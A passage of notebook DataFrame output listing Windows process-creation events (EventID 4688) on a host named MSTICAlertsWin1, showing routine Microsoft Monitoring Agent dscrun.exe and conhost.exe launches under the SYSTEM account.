c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:02:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1fc0...NaNNaNNaN1970-01-01 00:00:00.000000000c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1271004
c:\\windows\\system32\\conhost.exe0x17a42019-02-10 00:02:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:02:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x17a4...549.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-10 00:02:56.256999936c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/127/128127
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.25300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:12:56.253MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x10bc...NaNNaNNaN1970-01-01 00:00:00.000000000c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1291004
c:\\windows\\system32\\conhost.exe0x1c102019-02-10 00:12:56.26300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:12:56.263MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1c10...478.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-10 00:12:56.252999936c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/129/130129
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:32:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xb48...NaNNaNNaN1970-01-01 00:00:00.000000000c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1391004
c:\\windows\\system32\\conhost.exe0x235c2019-02-10 00:32:56.28700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:32:56.287MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x235c...553.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-10 00:32:56.270000128c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/139/140139
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:32:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xbd0...NaNNaNNaN1970-01-01 00:00:00.000000000c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/151004
c:\\windows\\system32\\conhost.exe0x14682019-02-09 21:32:56.29000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:32:56.290MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1468...848.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 21:32:56.270000128c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/15/1615
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x15c8...NaNNaNNaN1970-01-01 00:00:00.000000000c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/51004
c:\\windows\\system32\\conhost.exe0x12782019-02-09 20:32:56.28000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:32:56.280MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1278...850.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 20:32:56.260000000c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/5/65
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.26300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:02:56.263MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xe34...NaNNaNNaN1970-01-01 00:00:00.000000000c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/671004
c:\\windows\\system32\\conhost.exe0xbc2019-02-09 22:02:56.27700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:02:56.277MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xbc...984.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 22:02:56.263000064c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/67/6867
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.24700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.247MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x53c...NaNNaNNaN1970-01-01 00:00:00.000000000c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/761004
c:\\windows\\system32\\conhost.exe0x18342019-02-09 22:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1834...738.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 22:32:56.247000064c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/76/7776
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xef4...NaNNaNNaN1970-01-01 00:00:00.000000000c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/781004
c:\\windows\\system32\\conhost.exe0x15f42019-02-09 22:32:56.27300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.273MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x15f4...736.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 22:32:56.260000000c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/78/7978
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:52:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xcd8...NaNNaNNaN1970-01-01 00:00:00.000000000c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/81004
c:\\windows\\system32\\conhost.exe0xfd42019-02-09 20:52:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:52:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xfd4...887.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 20:52:56.260000000c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/8/98
\n

25 rows × 35 columns

\n
", "text/plain": " TenantId \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n\n Account \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... WORKGROUP\\MSTICAlertsWin1$ \n\n EventID \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 4688 \n\n TimeGenerated \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:02:56.257 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.273 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:22:56.257 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 2019-02-09 23:22:56.267 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:32:56.260 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 2019-02-09 23:32:56.280 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:02:56.257 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 2019-02-10 00:02:56.270 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:12:56.253 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 2019-02-10 00:12:56.263 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:32:56.270 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 2019-02-10 00:32:56.287 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:32:56.270 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 2019-02-09 21:32:56.290 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:32:56.260 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 2019-02-09 20:32:56.280 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:02:56.263 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 2019-02-09 22:02:56.277 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.247 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 2019-02-09 22:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.260 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 2019-02-09 22:32:56.273 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:52:56.260 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 2019-02-09 20:52:56.270 \n\n Computer \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... MSTICAlertsWin1 \n\n SubjectUserSid \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... S-1-5-18 \n\n SubjectUserName \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... MSTICAlertsWin1$ \n\n SubjectDomainName \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... WORKGROUP \n\n SubjectLogonId \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 0x3e7 \n\n NewProcessId ... \\\nproc_key ... \nc:\\program files\\microsoft monitoring agent\\age... 0x864 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x8dc ... \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 0x183c ... \nc:\\program files\\microsoft monitoring agent\\age... 0xd74 ... \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 0x21c8 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x6f8 ... \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 0x1c24 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x1fc0 ... \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 0x17a4 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x10bc ... \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 0x1c10 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xb48 ... \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 0x235c ... \nc:\\program files\\microsoft monitoring agent\\age... 0xbd0 ... \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 0x1468 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x15c8 ... \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 0x1278 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xe34 ... \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 0xbc ... \nc:\\program files\\microsoft monitoring agent\\age... 0x53c ... \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 0x1834 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xef4 ... \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 0x15f4 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xcd8 ... \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 0xfd4 ... \n\n source_index_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 998.0 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 749.0 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 883.0 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 549.0 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 478.0 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 553.0 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 848.0 